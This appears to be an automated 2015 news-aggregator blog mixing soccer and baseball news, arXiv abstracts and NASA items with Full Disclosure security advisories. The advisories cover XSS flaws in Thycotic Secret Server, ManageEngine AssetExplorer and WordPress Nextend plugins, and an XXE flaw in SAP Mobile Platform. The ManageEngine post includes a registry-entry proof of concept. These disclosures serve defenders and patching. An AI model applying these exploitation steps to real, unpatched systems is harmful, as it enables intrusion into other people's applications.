BASEL, Switzerland (AP) Swiss champion Basel says Austria forward Marc Janko has joined on a free transfer from Sydney.

from FOX Sports Digital http://ift.tt/1LELAf1
via IFTTT

Ajax signs defender John Heitinga on free transfer

AMSTERDAM (AP) John Heitinga is heading home to add some experience to Ajax's young defense.

from FOX Sports Digital http://ift.tt/1Gt3FsI
via IFTTT

Google Chrome Silently Listening to Your Private Conversations

Google was under fire of downloading and installing a Chrome extension surreptitiously and subsequently listened to the conversations of Chromium users without consent. After these accusations, a wave of criticism by privacy campaigners and open source developers has led Google to remove the extension from Chromium, the open-source version of the Chrome browser. The extension in


from The Hacker News http://ift.tt/1SMXdop
via IFTTT

Abstinence, What is it?

Please consider making a donation to support Nicotine Anonymous World ... This is the official website for Nicotine Anonymous World Services.

from Google Alert - anonymous http://ift.tt/1CvoZw7
via IFTTT

Marseille accepts West Ham offer for Payet

MARSEILLE, France (AP) Marseille has reluctantly accepted an offer from Premier League club West Ham for France midfielder playmaker Dimitri Payet.

from FOX Sports Digital http://ift.tt/1BCFFqv
via IFTTT

Mind Blowing Radar-based Gesture Recognition Technology for Everything

Since it introduced at the annual Google I/O conference, Project Soli has been trending on the Internet. Project Soli is one of Google's latest cutting-edge experiments that could actually transform the way humans interact with technology. Project Soli is not a wearable watch you might think it is. So what is Project Soli? It's you. Yes, you heard it right. Google's secretive


from The Hacker News http://ift.tt/1dhHsFZ
via IFTTT

Opposition: SAfrican soccer officials shielded from scrutiny

CAPE TOWN, South Africa (AP) South African soccer officials are being deliberately shielded from scrutiny over FIFA-related bribery allegations surrounding the country's successful 2010 World Cup bid, an opposition politician said Wednesday.

from FOX Sports Digital http://ift.tt/1TO7rX0
via IFTTT

Capturing Dark Matter with Black Holes

In this visualization, we plot the trajectories of random-distribution of hypothesized dark matter particles around a maximally-rotating black hole. The particles captured by the hole are seen collecting around the event horizon in the center, the particles experiencing stronger and stronger redshift, respresented by the stronger red coloration of the particle trail. The ergosphere is represented by the bluish oblate spheroid shape around the spherical event horizon. Inside the ergosphere, the distortion of space is so strong that particles must be deflected and carried with the rotation of the black hole. Hence, while the particles are traveling all different directions far from the black hole, we see them carried in the same direction close to the event horizon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1BBWCRG
via IFTTT

Triple Conjunction Over Galician National Park


What are those bright objects hovering over the horizon? Planets -- and the Moon. First out, the horizon featured is a shoreline of the Atlantic Ocean that occurs at the Galicia National Park in northern Spain. Next furthest out, on the left, is the Moon. Easily the brightest object on the night sky, the Moon here was in only a crescent phase. The next furthest out, on the right, is the planet Venus, while planet Jupiter is seen at the top of the triangle. The long exposure from our rapidly rotating Earth made all of celestial objects -- including the far distant stars -- appear as slight arcs. The featured image was taken last Sunday night. Although the Moon's orbit has now taken it away from this part of the sky, the planets Venus and Jupiter can be seen superposed just after sunset until mid-August. The closest apparent separation of Venus and Jupiter will occur in one week, when the two planets will appear separated by less than the angular diameter of the Moon. via NASA http://ift.tt/1fALvPa

Host Chile beats Uruguay to reach Copa America semifinals

SANTIAGO, Chile (AP) Chile's hopes of winning its home Copa America sharply improved with a 1-0 win over defending champion Uruguay on Wednesday.

from FOX Sports Digital http://ift.tt/1Lw1QC3
via IFTTT

Wednesday, June 24, 2015

Host Chile beats Uruguay 1-0 to reach Copa America semis

SANTIAGO, Chile (AP) Chile's hopes of winning its home Copa America were kept alive Wednesday thanks to a 1-0 win over defending champion Uruguay.

from FOX Sports Digital http://ift.tt/1GJbEo6
via IFTTT

Orioles Video: Bud Norris falls to 2-6, allows 5 unearned runs over 5.2 IP in loss to Red Sox; Chris Davis RBI single (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


About History
Historical Facts That Sound Like Huge Lies But Are Actually True...


Following: 2315 - Followers: 2146

June 24, 2015 at 11:03PM via Twitter http://twitter.com/Historyyfacts

[FD] CVE-2015-3443 XSS in Thycotic Secret Server version 8.6.000000 to 8.8.000004

############################################################# # # COMPASS SECURITY ADVISORY # http://ift.tt/JChVZk # ############################################################# # # CVE ID : CVE-2015-3443 # Product: Secret Server [1] # Vendor: Thycotic # Subject: Stored Cross-Site Scripting Vulnerability (XSS) # Risk: High # Effect: Remotely exploitable # Author: Marco Delai (marco.delai@csnc.ch) # Date: June 24th 2015 # ############################################################# Introduction:

Source: Gmail -> IFTTT-> Blogger

[FD] Securing SAP Systems from XSS vulnerabilities Part 2: Defense for SAP NetWeaver ABAP

Host Chile beats Uruguay to reach Copa America semifinals

SANTIAGO, Chile (AP) Defender Mauricio Isla scored in the 81st minute to help host Chile defeat defending champion Uruguay 1-0 and advance to the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1Jk31UO
via IFTTT

Leverage Financial News to Predict Stock Price Movements Using Word Embeddings and Deep Neural Networks. (arXiv:1506.07220v1 [cs.CE])

Financial news contains useful information on public companies and the market. In this paper we apply the popular word embedding methods and deep neural networks to leverage financial news to predict stock price movements in the market. Experimental results have shown that our proposed methods are simple but very effective, which can significantly improve the stock prediction accuracy on a standard financial database over the baseline system using only the historical price information.



from cs.AI updates on arXiv.org http://ift.tt/1e4jluW
via IFTTT

Sequential Extensions of Causal and Evidential Decision Theory. (arXiv:1506.07359v1 [cs.AI])

Moving beyond the dualistic view in AI where agent and environment are separated incurs new challenges for decision making, as calculation of expected utility is no longer straightforward. The non-dualistic decision theory literature is split between causal decision theory and evidential decision theory. We extend these decision algorithms to the sequential setting where the agent alternates between taking actions and observing their consequences. We find that evidential decision theory has two natural extensions while causal decision theory only has one.



from cs.AI updates on arXiv.org http://ift.tt/1e4joqC
via IFTTT

Parallel Multi-Dimensional LSTM, With Application to Fast Biomedical Volumetric Image Segmentation. (arXiv:1506.07452v1 [cs.CV])

Convolutional Neural Networks (CNNs) can be shifted across 2D images or 3D videos to segment them. They have a fixed input size and typically perceive only small local contexts of the pixels to be classified as foreground or background. In contrast, Multi-Dimensional Recurrent NNs (MD-RNNs) can perceive the entire spatio-temporal context of each pixel in a few sweeps through all pixels, especially when the RNN is a Long Short-Term Memory (LSTM). Despite these theoretical advantages, however, unlike CNNs, previous MD-LSTM variants were hard to parallelize on GPUs. Here we re-arrange the traditional cuboid order of computations in MD-LSTM in pyramidal fashion. The resulting PyraMiD-LSTM is easy to parallelize, especially for 3D data such as stacks of brain slice images. PyraMiD-LSTM achieved best known pixel-wise brain image segmentation results on MRBrainS13 (and competitive results on EM-ISBI12).



from cs.AI updates on arXiv.org http://ift.tt/1e4joqA
via IFTTT

Objective Variables for Probabilistic Revenue Maximization in Second-Price Auctions with Reserve. (arXiv:1506.07504v1 [stat.ML])

Many online companies sell advertisement space in second-price auctions with reserve. In this paper, we develop a probabilistic method to learn a profitable strategy to set the reserve price. We use historical auction data with features to fit a predictor of the best reserve price. This problem is delicate - the structure of the auction is such that a reserve price set too high is much worse than a reserve price set too low. To address this we develop objective variables, a new framework for combining probabilistic modeling with optimal decision-making. Objective variables are "hallucinated observations" that transform the revenue maximization task into a regularized maximum likelihood estimation problem, which we solve with an EM algorithm. This framework enables a variety of prediction mechanisms to set the reserve price. As examples, we study objective variable methods with regression, kernelized regression, and neural networks on simulated and real data. Our methods outperform previous approaches both in terms of scalability and profit.



from cs.AI updates on arXiv.org http://ift.tt/1BBzy5y
via IFTTT

Improve Anonymous Submissions - Graded Survey/Quiz

I would like to request an improvement to the Anonymous Submissions option within the Graded Survey feature when creating a new Quiz. Currently ...

from Google Alert - anonymous http://ift.tt/1QQSLYb
via IFTTT

Allow any anonymous user to automatically become registered and logged in without a form entry ...

Might as well go whole-hog and allow an anonymous user to just become temporarily registered and un-registered without ever seeing any form at all.

from Google Alert - anonymous http://ift.tt/1QQSLY9
via IFTTT

Opposition: SAfrican soccer officials shielded from scrutiny

CAPE TOWN, South Africa (AP) South Africa's main opposition party says the country's soccer officials are being shielded from scrutiny over bribery allegations surrounding the successful 2010 World Cup bid.

from FOX Sports Digital http://ift.tt/1GzbDzO
via IFTTT

Gamblers' Anonymous is a poor substitute – we need a serious treatment response for gambling ...

I spoke on BBC Radio Wales recently to discuss my former addiction to FOBTs. I was joined by ex-Wales international footballer John Hartson, who ...

from Google Alert - anonymous http://ift.tt/1Iex9zl
via IFTTT

Ravens: Jamison Hensley assigns letter grade to team's offseason; identifies best (DBs) and riskiest (Perriman) moves (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous User Password Creation on Checkout

Was wondering if anyone has had success with allowing users to create a password with their account when checking out. I've tried a couple solutions ...

from Google Alert - anonymous http://ift.tt/1CtjaiR
via IFTTT

[FD] ROP 101 Blog

Hi List, FYI - This is a post for the n00bs in the audience. If you already know how to chain together gadgets to form a ROP chain and get a shell, this post is not for you. I know there are some on the list who could benefit by a better understanding of ROP so: http://ift.tt/1FAaXcv The target binary/VM as well as some other info is available from the VulnHub page: http://ift.tt/1JiPGff Slides from the BSides London workshop are here: http://ift.tt/1IyLDWw Best Regards, Craig Young Security Researcher, Tripwire VERT @CraigTweets

Source: Gmail -> IFTTT-> Blogger

Capello survives meeting of Russian football leadership

MOSCOW (AP) Fabio Capello survived a crucial meeting of the Russian Football Union's executive committee on Wednesday amid widespread speculation the national coach would be fired, but faces talks on his future.

from FOX Sports Digital http://ift.tt/1CsKUnO
via IFTTT

Brazil striker Firmino joins Liverpool from Hoffenheim

LIVERPOOL, England (AP) Brazil forward Roberto Firmino joined Liverpool from German side Hoffenheim on Wednesday for a reported fee of 29 million pounds ($45.8 million) that would make him the second most expensive player in the English club's history.

from FOX Sports Digital http://ift.tt/1Hdxljk
via IFTTT

ISS Daily Summary Report – 06/23/15

Binary Colloidal Alloy Test Low Gravity Phase Kinetics Platform (BCAT-KP):  Kelly changed the camera battery, transferred images to a laptop for downlink, and set the D2Xs intervalometer. The BCAT-KP experiment aims to help materials scientists develop new consumer products with unique properties and longer shelf lives. Colloids are mixtures of small particles distributed throughout a liquid, which include milk, detergents and liquid crystals. Gravity affects how the particles clump together and sink, making the ISS an ideal platform to study their fundamental behaviors. Microbiome Setup: Kelly gathered and reviewed a reminder video prior to beginning his next round of Microbiome collections. The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time). To monitor the status of the crewmembers’ microbiome and immune system and their interaction with the unique environment of the ISS, periodic samples from different parts of the body and the surrounding ISS environment are taken. As part of this study, the likelihood and consequences of alterations in the microbiome due to extreme environments, and the related human health risk, will be assessed. Mobile Servicing System (MSS) Operations: Robotics Ground Controllers powered up the MSS in the Hot Backup Configuration in preparation for today’s SpX-7 Offset Grapple practice session. During the MSS power up they also performed the pre-launch checkouts. Kelly and Padalka practiced maneuvering the Space Station Remote Manipulator System (SSRMS) into the grapple envelope of the Special Purpose Dexterous Manipulator (SPDM) Power Data Grapple Fixture (PDGF).  They performed this eight times followed by a final run during which ground controllers safed the SSRMS to simulate a failure. The crew recovered by switching from the Cupola Robotic Workstation (RWS) to the Lab RWS and backed the SSRMS away.  Today’s Planned Activities All activities were completed unless otherwise noted. Micro-purification Unit cartridge F2 regeneration (start) SLEEP questionnaire RSS1,2 reboot [ВКС] laptops antivirus software update WRS – fill for processing from EDV PROBOI. The activity with on-board laptop RSЕ1. PROBOI. Ops with penetration simulator. BIOME questionnaire EHS water purification system sample collection TOCA – PWD water sample analysis PHS hardware setup PROBOI. Data copy and downlink HMS- PHS СОЖ Maintenance PHS data entry hardware stow MOTOKARD payload ops. RWS activation CALCIUM payload session #9. Cable КСПЭ SM-FOTO-D3-03 audit ECLSS vessel transfer and R&R Dragon capture OBT #1 Progress rendezvous monitoring tagup Cleaning panel vent screens of FGB interior panels (pan. 201, 301, 401) OBT – SSRMS OBT debrief TOCA data recording WRS – water sample analysis PAO equipment prep BCAT- Image transfer from video camera Crew prep for PAO PAO Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout URISYS hardware prep IMS update BIOME – prep for sample draw TOCA – data recording Micro-purification Unit cartridge F2 regeneration (end) Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. OBT Dragon offset grapple Three-Day Look Ahead: Wednesday, 06/24: Dragon OBT RoBOT, Biome Thursday, 06/25: Ocular Health, Dragon OBT RoBOT, Sprint Friday, 06/26: Crew off duty for work planned on Saturday QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1eHfZio
via IFTTT

'Undo Send' — How to Unsend Emails in Gmail

Sending an important and confidential email to one of my friends and mistakenly clicked send to someone else. Holy crap! This is something experienced by everyone of us at some point. When we accidentally hit the reply-all button, send an email to the wrong person, or sometimes forget to attach a file, and then left only with an instant pain of regret. It feels like there is no going back.


from The Hacker News http://ift.tt/1BAl3yW
via IFTTT

Creator of Blackshades Malware Jailed 4 Years in New York

A Swedish man who was the mastermind behind the $40 BlackShades Remote Access Tool (RAT) that infected over half a million systems around the world was sentenced to almost five years in a U.S. prison on Tuesday. Alex Yücel, 25, owned and operated an organization called "BlackShades" that sold a sophisticated and notorious form of software, called RAT, to several thousands of hackers and


from The Hacker News http://ift.tt/1GHmlau
via IFTTT

Senegal rewards U20 World Cup semifinalists with over $400K

DAKAR, Senegal (AP) The Senegal government says it will reward the under-20 soccer squad with over $400,000 for reaching the semifinals in its first appearance at the World Cup.

from FOX Sports Digital http://ift.tt/1Iyilr9
via IFTTT

Sharpless 308: Star Bubble


Blown by fast winds from a hot, massive star, this cosmic bubble is huge. Cataloged as Sharpless 2-308 it lies some 5,200 light-years away toward the constellation of the Big Dog (Canis Major) and covers slightly more of the sky than a Full Moon. That corresponds to a diameter of 60 light-years at its estimated distance. The massive star that created the bubble, a Wolf-Rayet star, is the bright one near the center of the nebula. Wolf-Rayet stars have over 20 times the mass of the Sun and are thought to be in a brief, pre-supernova phase of massive star evolution. Fast winds from this Wolf-Rayet star create the bubble-shaped nebula as they sweep up slower moving material from an earlier phase of evolution. The windblown nebula has an age of about 70,000 years. Relatively faint emission captured in the expansive image is dominated by the glow of ionized oxygen atoms mapped to a blue hue. via NASA http://ift.tt/1NgD9aH

Tuesday, June 23, 2015

Ocean City, MD's surf is at least 6.12ft high

Maryland-Delaware, June 28, 2015 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 6.12ft. At 10:00 AM, surf min of 5.02ft. At 4:00 PM, surf min of 4.42ft. At 10:00 PM, surf min of 4.02ft.

Surf maximum: 7.13ft (2.17m)
Surf minimum: 6.12ft (1.87m)
Tide height: 2.79ft (0.85m)
Wind direction: NE
Wind speed: 22.51 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Orioles Highlight: David Lough hits 3-run HR, Ubaldo Jimenez (3 ER in 5 IP) in 6-3 victory over Red Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Match fixer's accomplice sentenced to 34 months in jail

SINGAPORE (AP) Singapore media is reporting an accomplice of football match-fixer Wilson Raj Perumal has been sentenced to almost three years in jail for passport fraud.

from FOX Sports Digital http://ift.tt/1IcYbXJ
via IFTTT

On Available Corpora for Empirical Methods in Vision & Language. (arXiv:1506.06833v1 [cs.CL])

Integrating vision and language has long been a dream in work on artificial intelligence (AI). In the past two years, we have witnessed an explosion of work that brings together vision and language from images to videos and beyond. The available corpora have played a crucial role in advancing this area of research. In this paper, we propose a set of quality metrics for evaluating and analyzing the vision & language datasets and classify them accordingly. Our analyses show that the most recent datasets have been using more complex language and more abstract concepts, however, there are different strengths and weaknesses in each.



from cs.AI updates on arXiv.org http://ift.tt/1N7Wnij
via IFTTT

Scientific Discovery by Machine Intelligence: A New Avenue for Drug Research. (arXiv:1506.07116v1 [cs.AI])

The majority of big data is unstructured and of this majority the largest chunk is text. While data mining techniques are well developed and standardized for structured, numerical data, the realm of unstructured data is still largely unexplored. The general focus lies on information extraction, which attempts to retrieve known information from text. The Holy Grail, however is knowledge discovery, where machines are expected to unearth entirely new facts and relations that were not previously known by any human expert. Indeed, understanding the meaning of text is often considered as one of the main characteristics of human intelligence. The ultimate goal of semantic artificial intelligence is to devise software that can understand the meaning of free text, at least in the practical sense of providing new, actionable information condensed out of a body of documents. As a stepping stone on the road to this vision I will introduce a totally new approach to drug research, namely that of identifying relevant information by employing a self-organizing semantic engine to text mine large repositories of biomedical research papers, a technique pioneered by Merck with the InfoCodex software. I will describe the methodology and a first successful experiment for the discovery of new biomarkers and phenotypes for diabetes and obesity on the basis of PubMed abstracts, public clinical trials and Merck internal documents. The reported approach shows much promise and has potential to impact fundamentally pharmaceutical research as a way to shorten time-to-market of novel drugs, and for early recognition of dead ends.



from cs.AI updates on arXiv.org http://ift.tt/1fyR8gU
via IFTTT

Prefix-Projection Global Constraint for Sequential Pattern Mining. (arXiv:1504.07877v2 [cs.AI] UPDATED)

Sequential pattern mining under constraints is a challenging data mining task. Many efficient ad hoc methods have been developed for mining sequential patterns, but they are all suffering from a lack of genericity. Recent works have investigated Constraint Programming (CP) methods, but they are not still effective because of their encoding. In this paper, we propose a global constraint based on the projected databases principle which remedies to this drawback. Experiments show that our approach clearly outperforms CP approaches and competes well with ad hoc methods on large datasets.



from cs.AI updates on arXiv.org http://ift.tt/1Erdg4D
via IFTTT

South American football body mayuse reserve fund

SANTIAGO, Chile (AP) South American football's governing body may be forced to use a $10 million reserve fund to pay ongoing costs due to a cash-flow problem created by the FIFA bribery scandal.

from FOX Sports Digital http://ift.tt/1LkvNUK
via IFTTT

I have a new follower on Twitter


Jwliɑn☠†
Mis demonios internos, son mis peores enemigos...


Following: 809 - Followers: 890

June 23, 2015 at 07:46PM via Twitter http://twitter.com/EseTalJuli

I have a new follower on Twitter


Williemae Hayes
Don't forget Mother's Day. Or as they call it in Beverly Hills; Dad's Third Wife Day.


Following: 143 - Followers: 533

June 23, 2015 at 05:38PM via Twitter http://twitter.com/whheh86

Rivaldo ends retirement to play for his own team in Brazil

SAO PAULO (AP) Former star Rivaldo says he is ending his retirement and will start training again with Mogi Mirim, a second division team in the Brazilian league where he is the club president.

from FOX Sports Digital http://ift.tt/1GnNxZF
via IFTTT

[FD] Haka v0.3.0 release

Hey list, A new version (0.3.0) of Haka is available at haka-security.org. The new release adds a stream-based asm instruction disassembler module based on Capstone engine. This enables to detect obfuscated shellcode at network level for instance. The new version improves also logging performance and fixes various bugs. Thanks for all users who have reported these bugs. As a remainder, Haka is an open source security oriented language that allows to: * write fine-grained security rules and setup complex mitigation scenarios. * write text-based and binary-based protocol dissectors. Haka language is embedded into a modular framework allowing end-users to apply protocol dissection and security rule evaluation on live captured traffic. Regards, * http://ift.tt/Wa41EO * https://twitter.com/hakasecurity * http://ift.tt/1CdYONE

Source: Gmail -> IFTTT-> Blogger

[FD] XSS vulnerability in manage engine.

Title: =============== ManageEngine Asset Explorer v6.1 - XSS Vulnerability CVE-ID: ==================================== CVE-2015-2169 CVSS: ==================================== 3.5 Product & Service Introduction (Taken from their homepage): ==================================== ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM) software that helps you monitor and manage assets in your network from Planning phase to Disposal phase. AssetExplorer provides you with a number of ways to ensure discovery of all the assets in your network. You can manage software & hardware assets, ensure software license compliance and track purchase orders & contracts - the whole nine yards! AssetExplorer is very easy to install and works right out of the box. (Homepage: http://ift.tt/1QnQiAD ) Abstract Advisory Information: ============================== Cross site scripting attack can be performed on the manage engine asset explorer. If the 'publisher' name contains vulnerable script, it gets executed in the browser. Affected Products: ==================== Manage Engine Product: Asset Explorer - Web Application 6.1.0 (Build 6112) Severity Level: ==================== Medium Technical Details & Description: ================================ Add a vendor with a script in it to the registry. Login to the product, Scan the endpoint where the registry is modified. In the right pane, go to software->Scanned Software The script gets executed. Vulnerable Product(s): ManageEngine Asset Explorer Affected Version(s): Version 6.1.0 / Build Number 6112 (Earlier versions i did not test) Vulnerability Type(s): Persistent Cross Site Scripting PoC: ======================= Add the following registry entry in the machine, for targeted attack. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software] "DisplayName"="A fake software 2 installed" "UninstallString"="C:\\Program Files\\fake\\uninst.exe" "DisplayVersion"="0.500.20" "URLInfoAbout"="http://www.dummy.org" "Publisher"="" Security Risk: ================== Medium. Credits & Authors: ================== Suraj Krishnaswami (suraj.krishnaswami@gmail.com) Timeline: ================== Discovered at Wed, March 3, 2015 Informed manage engine about the vulnerability: March 4, 2015 Case moved to development team: March 4, 2015 Asked for updates: March 9, 2015 Asked for updates: March 13, 2015 Asked for updates: April 14, 2015 Public Disclosure at Mon, June 22, 2015

Source: Gmail -> IFTTT-> Blogger

[FD] Minds.com - Several Issues

The Hype ======== Before we begin, let's look at some of the hype that the Minds.com team has been feeding into on Twitter. https://twitter.com/minds/status/611536729175130112 ~> > #Anonymous backs new #encrypted #social network to rival Facebook http://ift.tt/1Sou16Y #minds #opensource #freedom #algorithm https://twitter.com/minds/status/612023517962477568 ~> > Anonymous Is Championing a Social Network That Has One Major Advantage Over Facebook by @maxplenke http://ift.tt/1GoTepd … via @MicNews https://twitter.com/minds/status/610499794834821121 ~> > #Anonymous is supporting a new privacy-focused #social network that takes aim at Facebook's shady practices http://read.bi/1cW4uSz via @sai https://twitter.com/WiredUK/status/610732859373043712 ~> > Anonymous backs encrypted social network 'Minds' http://wired.uk/8TxXRq Wow, if Anonymous backs this project, surely it must be legitimate and secure, right? The Reality =========== Prior Work by VoidSec

Source: Gmail -> IFTTT-> Blogger

[FD] New version: smalisca - Static Code Analysis tool for Smali files

Hi, We released a version 0.2 of smalisca. [ DESCRIPTION ] A static code analysis tool for Smali files. If you ever have looked at Android applications you know to appreciate the ability of analyzing your target at the most advanced level. Dynamic programm analysis will give you a pretty good overview of your applications activities and general behaviour. However sometimes you’ll want to just analyze your application without running it. You’ll want to have a look at its components, analyze how they interact and how data is tainted from one point to another. [ DOWNLOAD ] http://ift.tt/1CThFwh [ NOTES ] * open pull requests for bug reports / whatever on: http://ift.tt/1E08xYU or send direct email to cyneox[at]nullsecurity.net / team[at]nullsecurity.net Cheers, noptrix

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-4557 - Wordpress “Nextend Twitter Connect” & “Nextend Google Connect” Cross Site Scripting

Wordpress “Nextend Twitter Connect” =================================== Document Title: =============== WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting) Download URL: ============= http://ift.tt/14v5QQx Release Date: ============= 2015-06-20 Vulnerability CVE ID: ===================== CVE-2015-4557 Vulnerability Disclosure Timeline: ================================== 2015 – 06 – 15 First notified to WordPress. 2015 – 06 – 15 First notified to plugin vendor . 2015 – 06 – 15 First notified to Mitre for CVE number. 2015 – 06 – 16 Vendor publish update for the plugin. 2015 – 06 – 22 Public Disclosure. Discovery Status: ================= Published Severity Level: =============== High Technical Details, Description & Proof of Concept (PoC): ======================================================== After installing Wordpress I add the plugin "Nextend Twitter Connect" witch allow you to login Wordpress with Twitter account. During my test I find out that the “redirect_to” parameter is vulnerable to Reflected XSS attack. http://ift.tt/1Lsioe0 To reach to root of the problem, I took a look in the plugin source code and realized that the “new_Twitter_sign_button” witch located in the file “nextend-Twitter-connect.php”. The problematic function are locate in line 492: http://ift.tt/1GFDOjJ As you can see in the line 492, the function don’t escapes HTML tags or other dangerous symbols. When attacker injects the Javascript code in the URL the function runs the code, as you can see: http://ift.tt/1Lsioe2 And pop the alert window. Solution - Fix & Patch: ======================= In order to solve this security flaw you need to add the “htmlentities” function. (http://ift.tt/11pVKOE) As you can see in the image: http://ift.tt/1GFDOjL Wordpress “Nextend Google Connect” =================================== Document Title: =============== WordPress “Nextend Google Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting) Download URL: ============= http://ift.tt/1Lsimmr Release Date: ============= 2015-06-20 Vulnerability CVE ID: ===================== CVE-2015-4557 Vulnerability Disclosure Timeline: ================================== 2015 – 06 – 15 First notified to WordPress. 2015 – 06 – 15 First notified to plugin vendor . 2015 – 06 – 15 First notified to Mitre for CVE number. 2015 – 06 – 16 Vendor publish update for the plugin. 2015 – 06 – 22 Public Disclosure. Discovery Status: ================= Published Severity Level: =============== High Technical Details, Description & Proof of Concept (PoC): ======================================================== After installing Wordpress I add the plugin "Nextend Google Connect" witch allow you to login Wordpress with Google account. During my test I find out that the “redirect_to” parameter is vulnerable to Reflected XSS attack. http://ift.tt/1GFDQIs To reach to root of the problem, I took a look in the plugin source code and realized that the “new_google_sign_button” witch located in the file “nextend-Google-connect.php”. The problematic function are locate in line 433: http://ift.tt/1Lsimmv As you can see in the line 433, the function don’t escapes HTML tags or other dangerous symbols. When attacker injects the Javascript code in the URL the function runs the code, as you can see: http://ift.tt/1GFDOjN And pop the alert window. Solution - Fix & Patch: ======================= In order to solve this security flaw you need to add the “htmlentities” function. (http://ift.tt/11pVKOE) As you can see in the image: http://ift.tt/1Lsioea Liran Segal (Bugsec Information Security LTD) Regards, Liran Segal Penetration Testing BugSec Cyber & Information Security

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-4413 - Wordpress “Nextend Facebook Connect” Cross Site Scripting

Document Title: =============== WordPress “Nextend Facebook Connect” Plugin Version: 1.5.4 is vulnerable to Reflected XSS (Cross Site Scripting) Download URL: ============= http://ift.tt/1z6w2uA Release Date: ============= 2015-06-20 Vulnerability CVE ID: ===================== CVE-2015-4413 Vulnerability Disclosure Timeline: ================================== 2015 – 06 – 03 First notified to WordPress. 2015 – 06 – 07 First notified to plugin vendor . 2015 – 06 – 10 First notified to Mitre for CVE number. 2015 – 06 – 11 Vendor publish update for the plugin. 2015 – 06 – 22 Public Disclosure. Discovery Status: ================= Published Severity Level: =============== High Technical Details, Description & Proof of Concept (PoC): ======================================================== After installing Wordpress I add the plugin " Nextend Facebook Connect" witch allow you to login Wordpress with Facebook account. During my test I find out that the “redirect_to” parameter is vulnerable to Reflected XSS attack. To reach to root of the problem, I took a look in the plugin source code and realized that the “new_fb_sign_button()” witch located in the file “nextend-facebook-connect.php”. The problematic function are locate in line 432: http://ift.tt/1Lsim63 As you can see in the line 432, the function don’t escapes HTML tags or other dangerous symbols. When attacker injects the Javascript code in the URL the function runs the code, as you can see: http://ift.tt/1GFDOjF And pop the alert window. Solution - Fix & Patch: ======================= In order to solve this security flaw you need to add the “htmlentities” function. (http://ift.tt/11pVKOE) As you can see in the image: http://ift.tt/1GFDQIj Liran Segal (Bugsec Information Security LTD) Regards, Liran Segal Penetration Testing BugSec Cyber & Information Security

Source: Gmail -> IFTTT-> Blogger

Klinsmann picks 17 of 23 World Cup vets for Gold Cup

CHICAGO (AP) The U.S. roster for next month's CONCACAF Gold Cup will look a lot like the American team at last year's World Cup.

from FOX Sports Digital http://ift.tt/1SHCB0M
via IFTTT

[FD] ERPSCAN Research Advisory [ERPSCAN-15-011] SAP Mobile Platform 3.0 - XXE

ERPSCAN Research Advisory [ERPSCAN-15-011] SAP Mobile Platform 3.0 - XXE Application: SAP Mobile Platform 3.0 Versions Affected: SAP Mobile Platform 3.0, probably others Vendor URL: http://SAP.com Bugs: XML eXternal Entity Sent: 29.12.2014 Reported: 29.12.2014 Vendor response: 30.12.2014 Date of Public Advisory: 18.06.2015 Reference: SAP Security Note 2125513 Author: Vahagn Vardanyan (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP Mobile Platform 3.0 XXE Advisory ID: [ERPSCAN-15-011] Risk: High Advisory URL: http://ift.tt/1K8P9ek Date published: 15.03.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-611] Impact: XML external entity, information disclosure, denial of service Remotely Exploitable: Yes Locally Exploitable: No 3. VULNERABILITY DESCRIPTION The problem is caused by a program error in SAP Mobile Platform 3.0 due to the incorrect use of an XML parser (/mobiliser servlet). By default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed. This malicious content can reference internal resources, such as files. These internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable. 4. VULNERABLE PACKAGES SAP Mobile Platform 3.0 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2125513. 6. AUTHOR Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION SAP XML parser validates all incoming XML requests with a user-specified DTD. 8. REPORT TIMELINE Sent: 29.12.2014 Reported: 29.12.2014 Vendor response: 30.12.2014 Date of Public Advisory: 18.06.2015 9. REFERENCES http://ift.tt/1K8P9ek 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured 